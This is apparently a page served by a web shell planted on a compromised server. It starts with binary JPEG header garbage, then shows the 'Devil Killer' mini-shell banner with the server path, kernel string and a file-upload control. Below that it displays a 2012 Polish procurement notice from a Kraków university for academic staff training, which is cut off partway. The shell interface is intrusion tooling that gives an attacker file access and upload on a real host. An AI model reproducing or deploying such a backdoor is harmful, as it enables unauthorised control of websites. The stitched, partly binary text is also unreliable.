JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121105/233401-N-2012.html

<p class="kh_header"><b>Kraków: Przeprowadzenie szkoleń dla kadry akademickiej 
                        Uniwersytetu Papieskiego Jana Pawła II w Krakowie</b><br>
<b>Numer ogłoszenia: 233401 - 2012; data zamieszczenia: 05.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Papieski Jana Pawła II w Krakowie , ul. Kanonicza 25, 31-002 Kraków, woj. małopolskie, tel. 12 421 68 48, faks 12 421 68 48 wew. 24.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczne uczelnie katolickie finansowane na zasadach uczelni publicznych..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń dla kadry akademickiej 
                        Uniwersytetu Papieskiego Jana Pawła II w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi w zakresie przeprowadzenia szkoleń dla kadry akademickiej UPJP II. Zamówienie obejmuje przeprowadzenie łącznie 20 szkoleń, maksymalna liczba uczestników jednego szkolenia to 10 osób, w tym  dla: 

1.1. CZĘŚCI  I - Podstawy zarządzania personelem: 					1 szkolenie; 
1.2. CZĘŚCI II - Pozyskiwanie funduszy zewnętrznych na cele rozwojowe Uczelni: 	4 szkolenia; 
1.3. CZĘŚCI  III - Podstawy fundraisingu i sponsoringu: 				4 szkolenia; 
1.4. CZĘŚCI  IV - Prawne, administracyjne, finansowe, organizacyjne aspekty                                                        zarządzania uczelnią:
1.4.1. tytuł szkolenia: Kontrola zarządcza w szkole wyższej: 			1 szkolenie. 
1.4.2. tytuł szkolenia: Odpowiedzialność za naruszenie dyscypliny finansów
          publicznych w szkołach wyższych: 						1 szkolenie.
1.4.3. tytuł szkolenia: Plan rzeczowo - finansowy w szkołach wyższych 
          z uwzględnieniem programu naprawczego oraz nadzór nad finansami 
          publicznymi w szkołach wyższych: 						1 szkolenie.
1.4.4. tytuł szkolenia: Zamówienia publiczne w szkołach wyższych: 		1 szkolenie.
1.4.5. tytuł szkolenia: Zatrudnianie i wynagradzanie w szkołach wyższych: 	1 szkolenie.

1.5. CZĘŚCI V - Szkolenie z zasady równości szans kobiet i mężczyzn w projektach 
                            PO KL dla zespołu projektowego: 					1 szkolenie.

1.6. CZĘŚCI VI - Dostosowanie i tworzenie programów kształcenia oraz tworzenie 
                           opisów przedmiotów zgodnie z Krajowymi Ramami Kwalifikacji:	5 szkoleń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że  w ciągu ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:

- dla  CZĘŚĆI   I    Podstawy zarządzania personelem
co najmniej 48 godzin szkolenia lub 6 dni szkoleniowych, dla grupy co najmniej 10 osób (dzień szkoleniowy rozumiany jest jako 8 godzin szkolenia - jedna godzina szkoleniowa wynosi 45 minut), z zakresu podstaw zarządzania personelem;
- dla CZĘŚCI   II Pozyskiwanie funduszy zewnętrznych na cele rozwojowe Uczelni
co najmniej 48 godzin szkolenia lub 6 dni szkoleniowych, dla grupy co najmniej 10 osób (dzień szkoleniowy rozumiany jest jako 8 godzin szkolenia - jedna godzina szkoleniowa wynosi 45 minut) z zakresu pozyskiwania funduszy zewnętrznych na cele rozwojowe;
- dla CZĘŚCI   III Podstawy fundraisingu i sponsoringu

co najmniej 48 godzin szkolenia lub 6 dni szkoleniowych, dla grupy co najmniej 10 osób (dzień szkoleniowy rozumiany jest jako 8 godzin szkolenia - jedna godzina szkoleniowa wynosi 45 minut) z zakresu podstaw fundraisingu i sponsoringu;
- dla CZĘŚCI    IV   Prawne, administracyjne, finansowe, organizacyjne aspekty zarządzania uczelnią
co najmniej 48 godzin szkolenia lub 6 dni szkoleniowych, dla grupy co najmniej 10 osób (dzień szkoleniowy rozumiany jest jako 8 godzin szkolenia - jedna godzina szkoleniowa wynosi 45 minut) z  każdego  tytułu:
- kontrola zarządcza w szkole wyższej
- odpowiedzialność za naruszenie dyscypliny finansów publicznych w szkołach wyższych
- plan rzeczowo - finansowy w szkołach wyższych z uwzględnieniem programu naprawczego oraz nadzór nad finansami publicznymi w szkołach wyższych
- zamówienia publiczne w szkołach wyższych
- zatrudnianie i wynagradzanie w szkołach wyższych
- dla CZĘŚCI  V Szkolenie z zasady równości szans kobiet i mężczyzn w projektach PO KL dla zespołu projektowego
co najmniej 48 godzin szkolenia lub 6 dni szkoleniowych, dla grupy co najmniej 10 osób (dzień szkoleniowy rozumiany jest jako 8 godzin szkolenia - jedna godzina szkoleniowa wynosi 45 minut) z zakresu zasady równości szans kobiet i mężczyzn w projektach PO KL;
- dla CZĘŚCI VI Dostosowanie i tworzenie programów kształcenia oraz tworzenie opisów przedmiotów zgodnie z Krajowymi Ramami Kwalifikacji
co najmniej 48 godzin szkolenia lub 6 dni szkoleniowych, dla grupy co najmniej 10 osób (dzień szkoleniowy rozumiany jest jako 8 godzin szkolenia - jedna godzina szkoleniowa wynosi 45 minut) z zakresu dostosowania i tworzenia programów kształcenia zgodnie z Krajowymi Ramami Kwalifikacji;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy także załączyć:
1.   Wypełniony formularz  OFERTY  
2.   Formularz cenowy  
3.  Stosowne  Pełnomocnictwo</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 45</li>
<li>2 - Doświadczenie trenera wyznaczonego do  realizacji szkolenia w danej części - 55</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość zmiany postanowień zawartej umowy w zakresie: 
1) powierzenia wykonania szkolenia trenerowi, który nie został wskazany w ofercie, gdy konieczność dokonania tej zmiany wynika z przyczyn losowych, niezależnych od Wykonawcy, zmiana ta nie może prowadzić do obniżenia wymagań określonych w Specyfikacji Istotnych Warunków Zamówienia. Jeżeli Zamawiający uzna, że przyczyna jest uzasadniona - Wykonawca przedstawi nowego trenera posiadającego doświadczenie i kwalifikacje zawodowe co najmniej takie same jak trener wskazany w ofercie, na podstawie której wybrano Wykonawcę; 
2) terminu realizacji szkoleń, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Zamawiającego lub Wykonawcy. Zmiana terminu szkolenia może nastąpić po wyrażeniu zgody przez Wykonawcę i Zamawiającego z zastrzeżeniem ust. 4 niniejszego paragrafu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.upjp2.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Papieski Jana Pawła II w Krakowie, ul. Kanonicza 25, 31-002 Kraków, Biuro Zamówień Publicznych, parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2012 godzina 09:30, miejsce: Uniwersytet Papieski Jana Pawła II w Krakowie, ul. Kanonicza 25, 31-002 Kraków, Biuro Zamówień Publicznych, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Poddziałanie 4.1.1 Wzmocnienie potencjału dydaktycznego uczelni. Projekt pt. Efektywność zarządzania i jakość kształcenia miarą sukcesu w UPJPII..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚCI  I - Podstawy zarządzania personelem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla części I - Podstawy zarządzania personelem
a) ilość szkoleń:  1
b) liczba uczestników szkolenia: 10
c) ramy programowe szkolenia: 
Podstawy zarządzania personelem - zrozumienie procesów, jakie mają miejsce w gronie uczelnianym na różnym etapie jego rozwoju. Umożliwienie rozwoju kompetencji zarządczych związanych z motywowaniem, delegowaniem i udzielaniem informacji zwrotnej pracownikom uczelni. Cele:  poznanie zasad udzielania konstruktywnej krytyki i pochwały, nauczenie się delegowania zadań, aby były wykonane efektywnie - dobieranie sposobów motywacji zależnie od sytuacji i osoby, wzmocnienie zaangażowania pracowników w sprawy i działania Uczelni.
d) czas trwania 1 szkolenia: 16h dyd. + 8h dyd. follow-up  (1 godzina szkoleniowa = 45 minut)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 45</li>
<li>2. Doświadczenie trenera wyznaczonego do  realizacji szkolenia w danej części - 55</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pozyskiwanie funduszy zewnętrznych na cele rozwojowe Uczelni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ilość szkoleń:  4
b) liczba uczestników szkolenia: 10
c) ramy programowe szkolenia: 
- Pozyskiwanie funduszy strukturalnych przez uczelnie w okresie programowania 2007-2013: dostępne środki w l. 2012-2013. Program: 1. fundusze strukturalne dla uczelni;  2. mechanizmy i procedury pozyskiwania dofinansowania w ramach funduszy strukturalnych; 3. kwalifikowane typy projektów; 4. kwalifikowalność wydatków. Cele: nabycie i pogłębienie przez uczestników szkolenia wiedzy w zakresie aplikowania o fundusze unijne dostępne w l. 2012 - 2013.
- Pozyskiwanie funduszy strukturalnych na projekty inwestycyjne oraz projekty nieinwestycyjne. Program: 1. fundusze strukturalne dla uczelni w l. 2014 - 2020; 2. mechanizmy i procedury pozyskiwania dofinansowania w ramach funduszy strukturalnych w nowym okresie programowania; 3. kwalifikowane typy projektów; 4. kwalifikowalność wydatków. Cele: nabycie i pogłębienie przez uczestników szkolenia wiedzy w zakresie pozyskiwania funduszy strukturalnych na l. 2014 - 2020.
- Procedury aplikowania o projektowe środki zewnętrzne. Program: 1. Specyfika formularzy wniosków o dofinansowanie; 2. Konstruowanie założeń merytorycznych projektu; 3. Konstruowanie budżetu ogólnego i szczegółowego planowanego projektu;  4. Wypełnienie formularza wniosku o dofinansowanie w generatorze wniosków aplikacyjnych. Cele: nabycie i pogłębienie przez uczestników szkolenia umiejętności w zakresie aplikowania o fundusze unijne.
- Realizacja i rozliczenie projektów unijnych. Program: 1. Wytyczne, zasady i procedury realizacji projektów unijnych; 2. Sprawozdawczość rzeczowo - finansowa (w tym wypełniania wniosków o płatność); 3. Zatrudnianie, wynagradzanie i ewidencjonowanie; 4. Wdrażanie zadań projektowych; 5. Wydatkowanie środków z uwzględnieniem zamówień publicznych; 6. Procedury kontrolne. Cele: nabycie i pogłębienie przez uczestników szkolenia wiedzy w zakresie realizacji i rozliczenia projektów unijnych.
d) czas trwania 1 szkolenia: 16h dyd.  (1 godzina szkoleniowa = 45 minut)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 45</li>
<li>2. Doświadczenie trenera wyznaczonego do  realizacji szkolenia w danej części - 55</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Podstawy fundraisingu i sponsoringu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ilość szkoleń:  4
b) liczba uczestników szkolenia: 10
c) ramy programowe szkolenia: 
- Podstawy fundraisingu i sponsoringu: 1. Fundraising jako sposób finansowania szkół wyższych 2. Kompetencje i kwalifikacje niezbędne do rozwoju fundraisingu w szkołach wyższych 3. Etyka działań fundraisingowych 4. Etyczna współpraca z biznesem na rzecz finansowania i rozwoju uczelni 5. Możliwość rozwoju fundraisingu i sponsoringu na UPJPII. Cele: Rozwój wiedzy i umiejętności kadr kierowniczych Uczelni w zakresie rozwoju fundraisingu i współpracy z biznesem, zdefiniowanie podstaw systemu zarządzania wiedzą i umiejętnościami w zakresie fundraisingu i sponsoringu.

d) czas trwania 1 szkolenia: 16h dyd. (1 godzina szkoleniowa = 45 minut)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 45</li>
<li>2. Doświadczenie trenera wyznaczonego do  realizacji szkolenia w danej części - 55</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prawne, administracyjne, finansowe, organizacyjne aspekty zarządzania uczelnią.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ilość szkoleń:  5
b) liczba uczestników szkolenia: 10
c) ramy programowe szkolenia: 
- tytuł szkolenia: Kontrola zarządcza w szkole wyższej
- Cel szkolenia: szkolenie ma na celu przybliżenie i zapoznanie uczestników z zasadami wdrożenia systemu kontroli zarzadczej na poziomie Jednostki, w tym w szczególności w aspekcie prezentacji odpowiedzialności kadry kierowniczej w tym zakresie.
Ramowy program szkolenia: Podsumowanie dwuletnich doświadczeń w zakresie funkcjonowania systemu kontroli zarządczej w jsfp, w tym opinia krajowych organów kontrolnych; Wprowadzenie do zagadnienia kontroli zarządczej; Międzynarodowe standardy kontroli wewnętrznej COSO a standardy kontroli zarządczej Ministra Finansów; Budowa skutecznego systemu kontroli zarządczej na Uczelni Wyższej; Zakres odpowiedzialności na poszczególnych stanowiskach; Audyt wewnętrzny w systemie kontroli zarządczej; Zapewnienie o stanie kontroli zarządczej - podstawowe zasady i dobre praktyki, omówienie i prezentacja kaskadowego systemu składania oświadczeń o stanie kontroli zarządczej, omówienie i prezentacja relacji i powiązań: Kontrola zarządcza w praktyce, Dokumentowanie systemu kontroli zarządczej.	
- czas trwania 1 szkolenia: 8h dyd. (1 godzina szkoleniowa = 45 minut).

- tytuł szkolenia: Odpowiedzialność za naruszenie dyscypliny finansów publicznych w szkołach wyższych
- Cel szkolenia: szkolenie obejmuje omówienie zachowań stanowiących naruszenie dyscypliny finansów publicznych w świetle ustawy o odpowiedzialności za naruszenie dyscypliny finansów publicznych. Omówione zostaną kwestie dotyczące prawidłowości zaciągania zobowiązań i dokonywania wydatków ze środków publicznych, udzielania oraz rozliczania dotacji z budżetu, ustalania, pobierania i dochodzenia należności, a także czynów przewidujących karalność niezgodnego z przepisami udzielania zamówień publicznych.
Ramowy program szkolenia: Podstawy prawne finansów publicznych, Podstawy prawne odpowiedzialności za naruszenie dyscypliny finansów publicznych; Katalog naruszeń dyscypliny finansów publicznych; Strona podmiotowa: Umyślność, nieumyślność zachowania (wina); Zasady odpowiedzialności kierownika jednostki sektora finansów publicznych za zaniedbania w zakresie kontroli, członka organu kolegialnego, osób którym powierzono obowiązki w zakresie gospodarki finansowej, osób którym powierzono czynności przewidziane w przepisach o zamówieniach publicznych, osób gospodarujących środkami publicznymi przekazanymi podmiotom niezaliczanym do sektora finansów publicznych; Wyłączenie oraz niedochodzenie odpowiedzialności za naruszenie dyscypliny finansów publicznych (znikoma szkodliwość, działanie w celu usunięcia skutków zdarzenia losowego, nieprzekroczenie kwoty progowej, błąd co do prawa, niepoczytalność, odpowiedzialność za wykonanie polecenia lub wykonanie za naruszenie dyscypliny finansów publicznych); Odpowiedzialność za naruszenie dyscypliny finansów publicznych a inne rodzaje odpowiedzialności prawnej, Kary za naruszenie dyscypliny finansowej i dyrektywy ich wymiaru (upomnienie, nagana, kara pieniężna, zakaz pełnienia funkcji związanych z dysponowaniem środkami publicznymi), Przebieg postępowania - główne etapy, Rejestr prawomocnych orzeczeń o odpowiedzialności za naruszenie dyscypliny finansów publicznych.
- czas trwania 1 szkolenia: 8h dyd. (1 godzina szkoleniowa = 45 minut).

	 
- tytuł szkolenia: Plan rzeczowo - finansowy w szkołach wyższych z uwzględnieniem programu naprawczego oraz nadzór nad finansami publicznymi w szkołach wyższych
- Cel szkolenia: nabycie umiejętności sporządzania planu rzeczowo-finansowego oraz nadzór nad finansami publicznymi.
Ramowy program szkolenia: plan rzeczowo- finansowy w szkołach wyższych, sprawozdawczość finansowa, nadzór nad uczelnią wyższą, inwestycje, nadzór nad finansami publicznymi.	
- czas trwania 1 szkolenia: 8h dyd. (1 godzina szkoleniowa = 45 minut).	 

- tytuł szkolenia: Zamówienia publiczne w szkołach wyższych		 

- Cel szkolenia: szkolenie ma na celu przeprowadzenie każdego z uczestników przez całą procedurę przetargową poczynając od fazy przygotowania postępowania a na podpisaniu umowy oraz kontroli realizacji kontraktu kończąc. Na konkretnych przykładach wskazuje obszary narażone na występowaniu uchybień, uświadamia najczęstsze błędy popełniane podczas postępowania o udzielenie zamówienia publicznego oraz podpowiada jak postąpić jeśli do naruszenia jednak doszło. 
